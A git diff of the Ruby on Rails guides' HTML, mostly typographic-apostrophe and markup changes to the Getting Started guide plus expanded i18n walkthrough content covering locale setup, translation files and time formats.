    Tip In development mode (which is what you're working in by default), Rails reloads your application with every browser request, so there's no need to stop and restart the web server.In development mode (which is what you’re working in by default), Rails reloads your application with every browser request, so there’s no need to stop and restart the web server.
    -

    Congratulations, you're riding the rails! Now it's time to see how it all works.

    +

    Congratulations, you’re riding the rails! Now it’s time to see how it all works.

    6.4. The Model

    -

    The model file, app/models/post.rb is about as simple as it can get:

    +

    The model file, app/models/post.rb is about as simple as it can get:

    class Post < ActiveRecord::Base
    -end
    -
    -

    There isn't much to this file - but note that the Post class inherits from ActiveRecord::Base. Active Record supplies a great deal of functionality to your Rails models for free, including basic database CRUD (Create, Read, Update, Destroy) operations, data validation, as well as sophisticated search support and the ability to relate multiple models to one another.

    +end
    +

    There isn’t much to this file - but note that the Post class inherits from ActiveRecord::Base. Active Record supplies a great deal of functionality to your Rails models for free, including basic database CRUD (Create, Read, Update, Destroy) operations, data validation, as well as sophisticated search support and the ability to relate multiple models to one another.

    6.5. Adding Some Validation

    -

    Rails includes methods to help you validate the data that you send to models. Open the app/models/post.rb file and edit it:

    +

    Rails includes methods to help you validate the data that you send to models. Open the app/models/post.rb file and edit it:

    class Post < ActiveRecord::Base
       validates_presence_of :name, :title
       validates_length_of :title, :minimum => 5
    -end
    -
    -

    These changes will ensure that all posts have a name and a title, and that the title is at least five characters long. Rails can validate a variety of conditions in a model, including the presence or uniqueness of columns, their format, and the existence of associated objects.

    +end +

    These changes will ensure that all posts have a name and a title, and that the title is at least five characters long. Rails can validate a variety of conditions in a model, including the presence or uniqueness of columns, their format, and the existence of associated objects.

    6.6. Using the Console

    -

    To see your validations in action, you can use the console. The console is a command-line tool that lets you execute Ruby code in the context of your application:

    +

    To see your validations in action, you can use the console. The console is a command-line tool that lets you execute Ruby code in the context of your application:

    -
    $ script/console
    -
    -

    After the console loads, you can use it to work with your application's models:

    +
    $ script/console
    +

    After the console loads, you can use it to work with your application’s models:

    format.html # index.html.erb format.xml { render :xml => @posts } end -end -
    -

    This code sets the @posts instance variable to an array of all posts in the database. Post.find(:all) or Post.all calls the Post model to return all of the posts that are currently in the database, with no limiting conditions.

    +end +

    This code sets the @posts instance variable to an array of all posts in the database. Post.find(:all) or Post.all calls the Post model to return all of the posts that are currently in the database, with no limiting conditions.

    @@ -1176,7 +1151,7 @@ http://www.gnu.org/software/src-highlite --> For more information on finding records with Active Record, see Active Record Finders.
    -

    The respond_to block handles both HTML and XML calls to this action. If you browse to http://localhost:3000/posts.xml, you'll see all of the posts in XML format. The HTML format looks for a view in app/views/posts/ with a name that corresponds to the action name. Rails makes all of the instance variables from the action available to the view. Here's app/view/posts/index.html.erb:

    +

    The respond_to block handles both HTML and XML calls to this action. If you browse to http://localhost:3000/posts.xml, you’ll see all of the posts in XML format. The HTML format looks for a view in app/views/posts/ with a name that corresponds to the action name. Rails makes all of the instance variables from the action available to the view. Here’s app/view/posts/index.html.erb:

    <br /> -<%= link_to 'New post', new_post_path %> -
    -

    This view iterates over the contents of the @posts array to display content and links. A few things to note in the view:

    -
      +<%= link_to 'New post', new_post_path %>
    +

    This view iterates over the contents of the @posts array to display content and links. A few things to note in the view:

    +
    • h is a Rails helper method to sanitize displayed data, preventing cross-site scripting attacks @@ -1234,7 +1208,7 @@ http://www.gnu.org/software/src-highlite -->

    6.8. Customizing the Layout

    -

    The view is only part of the story of how HTML is displayed in your web browser. Rails also has the concept of layouts, which are containers for views. When Rails renders a view to the browser, it does so by putting the view's HTML into a layout's HTML. The script/generate scaffold command automatically created a default layout, app/views/layouts/posts.html.erb, for the posts. Open this layout in your editor and modify the body tag:

    +

    The view is only part of the story of how HTML is displayed in your web browser. Rails also has the concept of layouts, which are containers for views. When Rails renders a view to the browser, it does so by putting the view’s HTML into a layout’s HTML. The script/generate scaffold command automatically created a default layout, app/views/layouts/posts.html.erb, for the posts. Open this layout in your editor and modify the body tag:

    <%= yield %> </body> -</html> -
    -

    Now when you refresh the /posts page, you'll see a gray background to the page. This same gray background will be used throughout all the views for posts.

    +</html> +

    Now when you refresh the /posts page, you’ll see a gray background to the page. This same gray background will be used throughout all the views for posts.

    6.9. Creating New Posts

    -

    Creating a new post involves two actions. The first is the new action, which instantiates an empty Post object:

    +

    Creating a new post involves two actions. The first is the new action, which instantiates an empty Post object:

    format.html # new.html.erb format.xml { render :xml => @post } end -end -
    -

    The new.html.erb view displays this empty Post to the user:

    +end +

    The new.html.erb view displays this empty Post to the user:

    </p> <% end %> -<%= link_to 'Back', posts_path %> -
    -

    The form_for block is used to create an HTML form. Within this block, you have access to methods to build various controls on the form. For example, f.text_field :name tells Rails to create a text input on the form, and to hook it up to the name attribute of the instance being displayed. You can only use these methods with attributes of the model that the form is based on (in this case name, title, and content). Rails uses form_for in preference to having your write raw HTML because the code is more succinct, and because it explicitly ties the form to a particular model instance.

    +<%= link_to 'Back', posts_path %> +

    The form_for block is used to create an HTML form. Within this block, you have access to methods to build various controls on the form. For example, f.text_field :name tells Rails to create a text input on the form, and to hook it up to the name attribute of the instance being displayed. You can only use these methods with attributes of the model that the form is based on (in this case name, title, and content). Rails uses form_for in preference to having your write raw HTML because the code is more succinct, and because it explicitly ties the form to a particular model instance.

    @@ -1314,7 +1285,7 @@ http://www.gnu.org/software/src-highlite --> If you need to create an HTML form that displays arbitrary fields, not tied to a model, you should use the form_tag method, which provides shortcuts for building forms that are not necessarily tied to a model instance.
    -

    When the user clicks the Create button on this form, the browser will send information back to the create method of the controller (Rails knows to call the create method because the form is sent with an HTTP POST request; that's one of the conventions that I mentioned earlier):

    +

    When the user clicks the Create button on this form, the browser will send information back to the create method of the controller (Rails knows to call the create method because the form is sent with an HTTP POST request; that’s one of the conventions that I mentioned earlier):

    format.xml { render :xml => @post.errors, :status => :unprocessable_entity } end end -end -
    -

    The create action instantiates a new Post object from the data supplied by the user on the form, which Rails makes available in the params hash. After saving the new post, it uses flash[:notice] to create an informational message for the user, and redirects to the show action for the post. If there's any problem, the create action just shows the new view a second time, with any error messages.

    -

    Rails provides the flash hash (usually just called the Flash) so that messages can be carried over to another action, providing the user with useful information on the status of their request. In the case of create, the user never actually sees any page rendered during the Post creation process, because it immediately redirects to the new Post as soon Rails saves the record. The Flash carries over a message to the next action, so that when the user is redirected back to the show action, they are presented with a message saying "Post was successfully created."

    +end +

    The create action instantiates a new Post object from the data supplied by the user on the form, which Rails makes available in the params hash. After saving the new post, it uses flash[:notice] to create an informational message for the user, and redirects to the show action for the post. If there’s any problem, the create action just shows the new view a second time, with any error messages.

    +

    Rails provides the flash hash (usually just called the Flash) so that messages can be carried over to another action, providing the user with useful information on the status of their request. In the case of create, the user never actually sees any page rendered during the Post creation process, because it immediately redirects to the new Post as soon Rails saves the record. The Flash carries over a message to the next action, so that when the user is redirected back to the show action, they are presented with a message saying "Post was successfully created."

    6.10. Showing an Individual Post

    -

    When you click the show link for a post on the index page, it will bring you to a URL like http://localhost:3000/posts/1. Rails interprets this as a call to the show action for the resource, and passes in 1 as the :id parameter. Here's the show action:

    +

    When you click the show link for a post on the index page, it will bring you to a URL like http://localhost:3000/posts/1. Rails interprets this as a call to the show action for the resource, and passes in 1 as the :id parameter. Here’s the show action:

    format.html # show.html.erb format.xml { render :xml => @post } end -end -
    -

    The show action uses Post.find to search for a single record in the database by its id value. After finding the record, Rails displays it by using show.html.erb:

    +end +

    The show action uses Post.find to search for a single record in the database by its id value. After finding the record, Rails displays it by using show.html.erb:

    <%= link_to 'Edit', edit_post_path(@post) %> | -<%= link_to 'Back', posts_path %> -
    +<%= link_to 'Back', posts_path %>

    6.11. Editing Posts

    -

    Like creating a new post, editing a post is a two-part process. The first step is a request to edit_post_path(@post) with a particular post. This calls the edit action in the controller:

    +

    Like creating a new post, editing a post is a two-part process. The first step is a request to edit_post_path(@post) with a particular post. This calls the edit action in the controller:

    def edit
       @post = Post.find(params[:id])
    -end
    -
    -

    After finding the requested post, Rails uses the edit.html.erb view to display it:

    +end +

    After finding the requested post, Rails uses the edit.html.erb view to display it:

    <% end %> <%= link_to 'Show', @post %> | -<%= link_to 'Back', posts_path %> -
    -

    Submitting the form created by this view will invoke the update action within the controller:

    +<%= link_to 'Back', posts_path %> +

    Submitting the form created by this view will invoke the update action within the controller:

    format.xml { render :xml => @post.errors, :status => :unprocessable_entity } end end -end -
    -

    In the update action, Rails first uses the :id parameter passed back from the edit view to locate the database record that's being edited. The update_attributes call then takes the rest of the parameters from the request and applies them to this record. If all goes well, the user is redirected to the post's show view. If there are any problems, it's back to edit to correct them.

    +end +

    In the update action, Rails first uses the :id parameter passed back from the edit view to locate the database record that’s being edited. The update_attributes call then takes the rest of the parameters from the request and applies them to this record. If all goes well, the user is redirected to the post’s show view. If there are any problems, it’s back to edit to correct them.

    - +
    Note Sharp-eyed readers will have noticed that the form_for declaration is identical for the new and edit views. Rails generates different code for the two forms because it's smart enough to notice that in the one case it's being passed a new record that has never been saved, and in the other case an existing record that has already been saved to the database. In a production Rails application, you would ordinarily eliminate this duplication by moving identical code to a partial template, which you could then include in both parent templates. But the scaffold generator tries not to make too many assumptions, and generates code that’s easy to modify if you want different forms for create and edit.Sharp-eyed readers will have noticed that the form_for declaration is identical for the new and edit views. Rails generates different code for the two forms because it’s smart enough to notice that in the one case it’s being passed a new record that has never been saved, and in the other case an existing record that has already been saved to the database. In a production Rails application, you would ordinarily eliminate this duplication by moving identical code to a partial template, which you could then include in both parent templates. But the scaffold generator tries not to make too many assumptions, and generates code that’s easy to modify if you want different forms for create and edit.

    6.12. Destroying a Post

    -

    Finally, clicking one of the destroy links sends the associated id to the destroy action:

    +

    Finally, clicking one of the destroy links sends the associated id to the destroy action:

    format.html { redirect_to(posts_url) } format.xml { head :ok } end -end -
    -

    The destroy method of an Active Record model instance removes the corresponding record from the database. After that's done, there isn't any record to display, so Rails redirects the user's browser to the index view for the model.

    +end +

    The destroy method of an Active Record model instance removes the corresponding record from the database. After that’s done, there isn’t any record to display, so Rails redirects the user’s browser to the index view for the model.

    7. DRYing up the Code

    -

    At this point, it’s worth looking at some of the tools that Rails provides to eliminate duplication in your code. In particular, you can use partials to clean up duplication in views and filters to help with duplication in controllers.

    +

    At this point, it’s worth looking at some of the tools that Rails provides to eliminate duplication in your code. In particular, you can use partials to clean up duplication in views and filters to help with duplication in controllers.

    7.1. Using Partials to Eliminate View Duplication

    -

    As you saw earlier, the scaffold-generated views for the new and edit actions are largely identical. You can pull the shared code out into a partial template. This requires editing the new and edit views, and adding a new template. The new _form.html.erb template should be saved in the same app/views/posts folder as the files from which it is being extracted:

    -

    new.html.erb:

    +

    As you saw earlier, the scaffold-generated views for the new and edit actions are largely identical. You can pull the shared code out into a partial template. This requires editing the new and edit views, and adding a new template. The new _form.html.erb template should be saved in the same app/views/posts folder as the files from which it is being extracted:

    +

    new.html.erb:

    <%= render :partial => "form" %> -<%= link_to 'Back', posts_path %> -
    -

    edit.html.erb:

    +<%= link_to 'Back', posts_path %>
    +

    edit.html.erb:

    <%= render :partial => "form" %> <%= link_to 'Show', @post %> | -<%= link_to 'Back', posts_path %> -
    -

    _form.html.erb:

    +<%= link_to 'Back', posts_path %> +

    _form.html.erb:

    <p> <%= f.submit "Save" %> </p> -<% end %> -
    -

    Now, when Rails renders the new or edit view, it will insert the _form partial at the indicated point. Note the naming convention for partials: if you refer to a partial named form inside of a view, the corresponding file is _form.html.erb, with a leading underscore.

    -

    For more information on partials, refer to the Layouts and Rending in Rails guide.

    +<% end %> +

    Now, when Rails renders the new or edit view, it will insert the _form partial at the indicated point. Note the naming convention for partials: if you refer to a partial named form inside of a view, the corresponding file is _form.html.erb, with a leading underscore.

    +

    For more information on partials, refer to the Layouts and Rending in Rails guide.

    7.2. Using Filters to Eliminate Controller Duplication

    -

    At this point, if you look at the controller for posts, you’ll see some duplication:

    +

    At this point, if you look at the controller for posts, you’ll see some duplication:

    @post = Post.find(params[:id]) # ... end -end -
    -

    Four instances of the exact same line of code doesn’t seem very DRY. Rails provides filters as a way to address this sort of repeated code. In this case, you can DRY things up by using a before_filter:

    +end +

    Four instances of the exact same line of code doesn’t seem very DRY. Rails provides filters as a way to address this sort of repeated code. In this case, you can DRY things up by using a before_filter:

    def find_post @post = Post.find(params[:id]) end -end -
    -

    Rails runs before filters before any action in the controller. You can use the :only clause to limit a before filter to only certain actions, or an :except clause to specifically skip a before filter for certain actions. Rails also allows you to define after filters that run after processing an action, as well as around filters that surround the processing of actions. Filters can also be defined in external classes to make it easy to share them between controllers.

    -

    For more information on filters, see the Action Controller Basics guide.

    +end +

    Rails runs before filters before any action in the controller. You can use the :only clause to limit a before filter to only certain actions, or an :except clause to specifically skip a before filter for certain actions. Rails also allows you to define after filters that run after processing an action, as well as around filters that surround the processing of actions. Filters can also be defined in external classes to make it easy to share them between controllers.

    +

    For more information on filters, see the Action Controller Basics guide.

    8. Adding a Second Model

    -

    Now that you've seen what's in a model built with scaffolding, it's time to add a second model to the application. The second model will handle comments on blog posts.

    +

    Now that you’ve seen what’s in a model built with scaffolding, it’s time to add a second model to the application. The second model will handle comments on blog posts.

    8.1. Generating a Model

    -

    Models in Rails use a singular name, and their corresponding database tables use a plural name. For the model to hold comments, the convention is to use the name Comment. Even if you don't want to use the entire apparatus set up by scaffolding, most Rails developers still use generators to make things like models and controllers. To create the new model, run this command in your terminal:

    +

    Models in Rails use a singular name, and their corresponding database tables use a plural name. For the model to hold comments, the convention is to use the name Comment. Even if you don’t want to use the entire apparatus set up by scaffolding, most Rails developers still use generators to make things like models and controllers. To create the new model, run this command in your terminal:

    -
    $ script/generate model Comment commenter:string body:text post:references
    -
    -

    This command will generate four files:

    -
      +
      $ script/generate model Comment commenter:string body:text post:references
    +

    This command will generate four files:

    +
    • app/models/comment.rb - The model @@ -1619,7 +1577,7 @@ http://www.gnu.org/software/src-highlite -->

    -

    First, take a look at comment.rb:

    +

    First, take a look at comment.rb:

    class Comment < ActiveRecord::Base
       belongs_to :post
    -end
    -
    -

    This is very similar to the post.rb model that you saw earlier. The difference is the line belongs_to :post, which sets up an Active Record association. You'll learn a little about associations in the next section of this guide.

    -

    In addition to the model, Rails has also made a migration to create the corresponding database table:

    +end +

    This is very similar to the post.rb model that you saw earlier. The difference is the line belongs_to :post, which sets up an Active Record association. You’ll learn a little about associations in the next section of this guide.

    +

    In addition to the model, Rails has also made a migration to create the corresponding database table:

    def self.down drop_table :comments end -end -
    -

    The t.references line sets up a foreign key column for the association between the two models. Go ahead and run the migration:

    +end +

    The t.references line sets up a foreign key column for the association between the two models. Go ahead and run the migration:

    -
    $ rake db:migrate
    -
    -

    Rails is smart enough to only execute the migrations that have not already been run against this particular database.

    +
    $ rake db:migrate
    +

    Rails is smart enough to only execute the migrations that have not already been run against this particular database.

    8.2. Associating Models

    -

    Active Record associations let you easily declare the relationship between two models. In the case of comments and posts, you could write out the relationships this way:

    -
      +

      Active Record associations let you easily declare the relationship between two models. In the case of comments and posts, you could write out the relationships this way:

      +
      • Each comment belongs to one post @@ -1675,7 +1630,7 @@ One post can have many comments

      -

      In fact, this is very close to the syntax that Rails uses to declare this association. You've already seen the line of code inside the Comment model that makes each comment belong to a Post:

      +

      In fact, this is very close to the syntax that Rails uses to declare this association. You’ve already seen the line of code inside the Comment model that makes each comment belong to a Post:

      class Comment < ActiveRecord::Base
         belongs_to :post
      -end
      -
      -

      You'll need to edit the post.rb file to add the other side of the association:

      +end
    +

    You’ll need to edit the post.rb file to add the other side of the association:

    validates_presence_of :name, :title validates_length_of :title, :minimum => 5 has_many :comments -end -
    -

    These two declarations enable a good bit of automatic behavior. For example, if you have an instance variable @post containing a post, you can retrieve all the comments belonging to that post as the array @post.comments.

    +end +

    These two declarations enable a good bit of automatic behavior. For example, if you have an instance variable @post containing a post, you can retrieve all the comments belonging to that post as the array @post.comments.

    @@ -1707,7 +1660,7 @@ http://www.gnu.org/software/src-highlite -->

    8.3. Adding a Route

    -

    Routes are entries in the config/routes.rb file that tell Rails how to match incoming HTTP requests to controller actions. Open up that file and find the existing line referring to posts. Then edit it as follows:

    +

    Routes are entries in the config/routes.rb file that tell Rails how to match incoming HTTP requests to controller actions. Open up that file and find the existing line referring to posts. Then edit it as follows:

    map.resources :posts do |post|
       post.resources :comments
    -end
    -
    -

    This creates comments as a nested resource within posts. This is another part of capturing the hierarchical relationship that exists between posts and comments.

    +end +

    This creates comments as a nested resource within posts. This is another part of capturing the hierarchical relationship that exists between posts and comments.

    @@ -1727,16 +1679,15 @@ http://www.gnu.org/software/src-highlite -->

    8.4. Generating a Controller

    -

    With the model in hand, you can turn your attention to creating a matching controller. Again, there's a generator for this:

    +

    With the model in hand, you can turn your attention to creating a matching controller. Again, there’s a generator for this:

    -
    $ script/generate controller Comments index show new edit
    -
    -

    This creates seven files:

    -
      +
      $ script/generate controller Comments index show new edit
    +

    This creates seven files:

    +
    • app/controllers/comments_controller.rb - The controller @@ -1773,7 +1724,7 @@ http://www.gnu.org/software/src-highlite -->

    -

    The controller will be generated with empty methods for each action that you specified in the call to script/generate controller:

    +

    The controller will be generated with empty methods for each action that you specified in the call to script/generate controller:

    def edit end -end -
    -

    You'll need to flesh this out with code to actually process requests appropriately in each method. Here's a version that (for simplicity's sake) only responds to requests that require HTML:

    +end +

    You’ll need to flesh this out with code to actually process requests appropriately in each method. Here’s a version that (for simplicity’s sake) only responds to requests that require HTML:

    end end -end -
    -

    You'll see a bit more complexity here than you did in the controller for posts. That's a side-effect of the nesting that you've set up; each request for a comment has to keep track of the post to which the comment is attached.

    -

    In addition, the code takes advantage of some of the methods available for an association. For example, in the new method, it calls

    +end +

    You’ll see a bit more complexity here than you did in the controller for posts. That’s a side-effect of the nesting that you’ve set up; each request for a comment has to keep track of the post to which the comment is attached.

    +

    In addition, the code takes advantage of some of the methods available for an association. For example, in the new method, it calls

    -
    @comment = @post.comments.build
    -
    -

    This creates a new Comment object and sets up the post_id field to have the id from the specified Post object in a single operation.

    +
    @comment = @post.comments.build
    +

    This creates a new Comment object and sets up the post_id field to have the id from the specified Post object in a single operation.

    8.5. Building Views

    -

    Because you skipped scaffolding, you'll need to build views for comments "by hand." Invoking script/generate controller will give you skeleton views, but they'll be devoid of actual content. Here's a first pass at fleshing out the comment views.

    -

    The index.html.erb view:

    +

    Because you skipped scaffolding, you’ll need to build views for comments "by hand." Invoking script/generate controller will give you skeleton views, but they’ll be devoid of actual content. Here’s a first pass at fleshing out the comment views.

    +

    The index.html.erb view:

    <br /> <%= link_to 'New comment', new_post_comment_path(@post) %> -<%= link_to 'Back to Post', @post %> -
    -

    The new.html.erb view:

    +<%= link_to 'Back to Post', @post %> +

    The new.html.erb view:

    </p> <% end %> -<%= link_to 'Back', post_comments_path(@post) %> -
    -

    The show.html.erb view:

    +<%= link_to 'Back', post_comments_path(@post) %> +

    The show.html.erb view:

    </p> <%= link_to 'Edit', edit_post_comment_path(@post, @comment) %> | -<%= link_to 'Back', post_comments_path(@post) %> -
    -

    The edit.html.erb view:

    +<%= link_to 'Back', post_comments_path(@post) %> +

    The edit.html.erb view:

    <% end %> <%= link_to 'Show', post_comment_path(@post, @comment) %> | -<%= link_to 'Back', post_comments_path(@post) %> -
    -

    Again, the added complexity here (compared to the views you saw for managing comments) comes from the necessity of juggling a post and its comments at the same time.

    +<%= link_to 'Back', post_comments_path(@post) %> +

    Again, the added complexity here (compared to the views you saw for managing comments) comes from the necessity of juggling a post and its comments at the same time.

    8.6. Hooking Comments to Posts

    -

    As a final step, I'll modify the show.html.erb view for a post to show the comments on that post, and to allow managing those comments:

    +

    As a final step, I’ll modify the show.html.erb view for a post to show the comments on that post, and to allow managing those comments:

    <%= link_to 'Edit', edit_post_path(@post) %> | <%= link_to 'Back', posts_path %> -<%= link_to 'Manage Comments', post_comments_path(@post) %> -
    -

    Note that each post has its own individual comments collection, accessible as @post.comments. That's a consequence of the declarative associations in the models. Path helpers such as post_comments_path come from the nested route declaration in config/routes.rb.

    +<%= link_to 'Manage Comments', post_comments_path(@post) %> +

    Note that each post has its own individual comments collection, accessible as @post.comments. That’s a consequence of the declarative associations in the models. Path helpers such as post_comments_path come from the nested route declaration in config/routes.rb.

    -

    9. What's Next?

    +

    9. What’s Next?

    -

    Now that you've seen your first Rails application, you should feel free to update it and experiment on your own. But you don't have to do everything without help. As you need assistance getting up and running with Rails, feel free to consult these support resources:

    -
      +

      Now that you’ve seen your first Rails application, you should feel free to update it and experiment on your own. But you don’t have to do everything without help. As you need assistance getting up and running with Rails, feel free to consult these support resources:

      +
      -

      Rails also comes with built-in help that you can generate using the rake command-line utility:

      -
        +

        Rails also comes with built-in help that you can generate using the rake command-line utility:

        +
        • Running rake doc:guides will put a full copy of the Rails Guides in the /doc/guides folder of your application. Open /doc/guides/index.html in your web browser to explore the Guides. @@ -2042,8 +1985,8 @@ Running rake doc:rails will put a full copy of the API documentation fo

        10. Changelog

        - -
          + +
          • November 3, 2008: Formatting patch from Dave Rothlisberger diff --git a/railties/doc/guides/html/i18n.html b/railties/doc/guides/html/i18n.html index 3ceba0f687..4d2e4bb7a3 100644 --- a/railties/doc/guides/html/i18n.html +++ b/railties/doc/guides/html/i18n.html @@ -209,14 +209,24 @@ ul#navMain {

        • - Walkthrough: setup a simple I18n'ed Rails application + Walkthrough: setup a simple I18n’ed Rails application +
        • +
        • + Internationalize your application +
        • @@ -273,13 +283,13 @@ ul#navMain {

          The Rails Internationalization API

          -

          The Ruby I18n gem which is shipped with Ruby on Rails (starting from Rails 2.2) provides an easy-to-use and extensible framework for translating your application to a single custom language other than English or providing multi-language support in your application.

          +

          The Ruby I18n gem which is shipped with Ruby on Rails (starting from Rails 2.2) provides an easy-to-use and extensible framework for translating your application to a single custom language other than English or providing multi-language support in your application.

          1. How I18n in Ruby on Rails works

          -

          Internationalization is a complex problem. Natural languages differ in so many ways that it is hard to provide tools for solving all problems at once. For that reason the Rails I18n API focusses on:

          -
            +

            Internationalization is a complex problem. Natural languages differ in so many ways that it is hard to provide tools for solving all problems at once. For that reason the Rails I18n API focusses on:

            +
            • providing support for English and similar languages out of the box @@ -292,8 +302,8 @@ making it easy to customize and extend everything for other languages

            1.1. The overall architecture of the library

            -

            To solve this the Ruby I18n gem is split into two parts:

            -
              +

              Thus, the Ruby I18n gem is split into two parts:

              +
              • The public API which is just a Ruby module with a bunch of public methods and definitions how the library works. @@ -305,18 +315,25 @@ A shipped backend (which is intentionally named the Simple backend) that impleme

              -

              As a user you should always only access the public methods on the I18n module but it is useful to know about the capabilities of the backend you use and maybe exchange the shipped Simple backend with a more powerful one.

              +

              As a user you should always only access the public methods on the I18n module but it is useful to know about the capabilities of the backend you use and maybe exchange the shipped Simple backend with a more powerful one.

              1.2. The public I18n API

              -

              We will go into more detail about the public methods later but here's a quick overview. The most important methods are:

              +

              We will go into more detail about the public methods later but here’s a quick overview. The most important methods are:

              translate         # lookup translations
              -localize          # localize Date and Time objects to local formats
              -
              -

              There are also attribute readers and writers for the following attributes:

              +localize # localize Date and Time objects to local formats
          +

          These have the aliases #t and #l so you can use them like this:

          +
          +
          +
          I18n.t 'store.title'
          +I18n.l Time.now
          +

          There are also attribute readers and writers for the following attributes:

          locale # get and set the current locale default_locale # get and set the default locale exception_handler # use a different exception_handler -backend # use a different backend -
          +backend # use a different backend
        -

        2. Walkthrough: setup a simple I18n'ed Rails application

        +

        2. Walkthrough: setup a simple I18n’ed Rails application

        -

        There are just a few, simple steps to get up and running with a I18n support for your application.

        +

        There are just a few, simple steps to get up and running with a I18n support for your application.

        2.1. Configure the I18n module

        -

        First of all you want to tell the I18n library where it can find your custom translation files. You might also want to set your default locale to something else than English.

        -

        You can pick whatever directory and translation file naming scheme makes sense for you. The simplest thing possible is probably to put the following into an initializer:

        +

        Rails will wire up all required settings for you with sane defaults. If you need different settings you can overwrite them easily.

        +

        The I18n library will use English (:en) as a default locale by default. I.e if you don’t set a different locale, :en will be used for looking up translations. Also, Rails adds all files from config/locales/*.rb,yml to your translations load path.

        +

        The translations load path (I18n.load_path) is just a Ruby Array of paths to your translation files that will be loaded automatically and available in your application. You can pick whatever directory and translation file naming scheme makes sense for you.

        +

        (Hint: The backend will lazy-load these translations when a translation is looked up for the first time. This makes it possible to just swap the backend with something else even after translations have already been announced.)

        +

        The default environment.rb says:

        +
        +
        +
        # The internationalization framework can be changed
        +# to have another default locale (standard is :en) or more load paths.
        +# All files from config/locales/*.rb,yml are added automatically.
        +# config.i18n.load_path << Dir[File.join(RAILS_ROOT, 'my', 'locales', '*.{rb,yml}')]
        +# config.i18n.default_locale = :de
        +

        2.2. Optional: custom I18n configuration setup

        +

        For the sake of completeness let’s mention that if you do not want to use the environment for some reason you can always wire up things manually, too.

        +

        To tell the I18n library where it can find your custom translation files you can specify the load path anywhere in your application - just make sure it gets run before any translations are actually looked up. You might also want to change the default locale. The simplest thing possible is to put the following into an initializer:

        I18n.load_path += Dir[ File.join(RAILS_ROOT, 'lib', 'locale', '*.{rb,yml}') ] # you can omit this if you're happy with English as a default locale -I18n.default_locale = :"pt" -
        -

        I18n.load_path is just a Ruby Array of paths to your translation files. The backend will lazy-load these translations when a translation is looked up for the first time. This makes it possible to just swap the backend with something else even after translations have already been announced.

        -

        2.2. Set the locale in each request

        -

        By default the I18n library will use the I18n.default_locale for looking up translations (if you do not specify a locale for a lookup) and this will, by default, en (English).

        -

        If you want to translate your Rails application to a single language other than English you can set I18n.default_locale to your locale. If you want to change the locale on a per-request basis though you can set it in a before_filter on the ApplicationController like this:

        +I18n.default_locale = :pt
        +

        2.3. Set the locale in each request

        +

        By default the I18n library will use :en (English) as a I18n.default_locale for looking up translations (if you do not specify a locale for a lookup).

        +

        If you want to translate your Rails application to a single language other than English you can set I18n.default_locale to your locale. If you want to change the locale on a per-request basis though you can set it in a before_filter on the ApplicationController like this:

        def set_locale # if this is nil then I18n.default_locale will be used I18n.locale = params[:locale] -end -
        -

        This will already work for URLs where you pass the locale as a query parameter as in example.com?locale=pt-BR (which is what Google also does). (TODO hints about other approaches in the resources section).

        -

        Now you've initialized I18n support for your application and told it which locale should be used. With that in place you're now ready for the really interesting stuff.

        -

        2.3. Internationalize your application

        -

        The process of "internationalization" usually means to abstract all strings and other locale specific bits out of your application (TODO reference to wikipedia). The process of "localization" means to then provide translations and localized formats for these bits.

        -

        So, let's internationalize something. You most probably have something like this in one of your applications:

        +end
    +

    This will already work for URLs where you pass the locale as a query parameter as in example.com?locale=pt (which is what Google also does).

    +
    + + + +
    +Tip +For other URL designs, see How to encode the current locale in the URL.
    +
    +

    Now you’ve initialized I18n support for your application and told it which locale should be used. With that in place you’re now ready for the really interesting stuff.

    +
    +

    3. Internationalize your application

    +
    +

    The process of "internationalization" usually means to abstract all strings and other locale specific bits out of your application. The process of "localization" means to then provide translations and localized formats for these bits. [1]

    +

    So, let’s internationalize something. You most probably have something like this in one of your applications:

    # app/views/home/index.html.erb <h1><%=t :hello_world %></h1> -<p><%= flash[:notice] %></p> -
    -

    TODO insert note about #t helper compared to I18n.t

    -

    TODO insert note/reference about structuring translation keys

    -

    When you now render this view it will show an error message that tells you that the translations for the keys :hello_world and :hello_flash are missing.

    -

    TODO screenshot

    -

    So let's add the missing translations (i.e. do the "localization" part):

    +<p><%= flash[:notice] %></p>
    +

    When you now render this view it will show an error message that tells you that the translations for the keys :hello_world and :hello_flash are missing.

    +

    +rails i18n demo translation missing +

    +
    + + + +
    +Note +Rails adds a t (translate) helper method to your views so that you do not need to spell out I18n.t all the time. Additionally this helper will catch missing translations and wrap the resulting error message into a <span class="translation_missing">.
    +
    +

    So let’s add the missing translations (i.e. do the "localization" part):

    -
    # lib/locale/en.yml
    -en-US:
    +
    # config/locale/en.yml
    +en:
       hello_world: Hello World
       hello_flash: Hello Flash
     
    -# lib/locale/pirate.yml
    +# config/locale/pirate.yml
     pirate:
       hello_world: Ahoy World
    -  hello_flash: Ahoy Flash
    -
    -

    There you go. Your application now shows:

    -

    TODO screenshot

    + hello_flash: Ahoy Flash
    +

    There you go. Because you haven’t changed the default_locale I18n will use English. Your application now shows:

    +

    +rails i18n demo translated to english +

    +

    And when you change the URL to pass the pirate locale you get:

    +

    +rails i18n demo translated to pirate +

    +

    NOTE You need to restart the server when you add new locale files.

    +

    3.2. Adding Date/Time formats

    +

    Ok, let’s add a timestamp to the view so we can demo the date/time localization feature as well. To localize the time format you pass the Time object to I18n.l or (preferably) use Rails' #l helper. You can pick a format by passing the :format option, by default the :default format is used.

    -
    I18n.t 'store.title'
    -I18n.l Time.now
    -
    +
    # app/views/home/index.html.erb
    +<h1><%=t :hello_world %></h1>
    +<p><%= flash[:notice] %></p
    +<p><%= l Time.now, :format => :short %></p>
    +

    And in our pirate translations file let’s add a time format (it’s already there in Rails' defaults for English):

    +
    +
    +
    # config/locale/pirate.yml
    +pirate:
    +  time:
    +    formats:
    +      short: "arrrround %H'ish"
    +

    So that would give you:

    +

    +rails i18n demo localized time to pirate +

    +

    NOTE Right now you might need to add some more date/time formats in order to make the I18n backend work as expected. See the rails-i18n repository for starting points.

    -

    3. Overview of the I18n API features

    +

    4. Overview of the I18n API features

    -

    The following purposes are covered:

    -
      +

      The following purposes are covered:

      +
      • lookup translations @@ -463,35 +536,32 @@ localize dates, numbers, currency etc.

      -

      3.1. Looking up translations

      -

      3.1.1. Basic lookup, scopes and nested keys

      -

      Translations are looked up by keys which can be both Symbols or Strings, so these calls are equivalent:

      +

      4.1. Looking up translations

      +

      4.1.1. Basic lookup, scopes and nested keys

      +

      Translations are looked up by keys which can be both Symbols or Strings, so these calls are equivalent:

      I18n.t :message
      -I18n.t 'message'
      -
      -

      translate also takes a :scope option which can contain one or many additional keys that will be used to specify a “namespace” or scope for a translation key:

      +I18n.t 'message'
    +

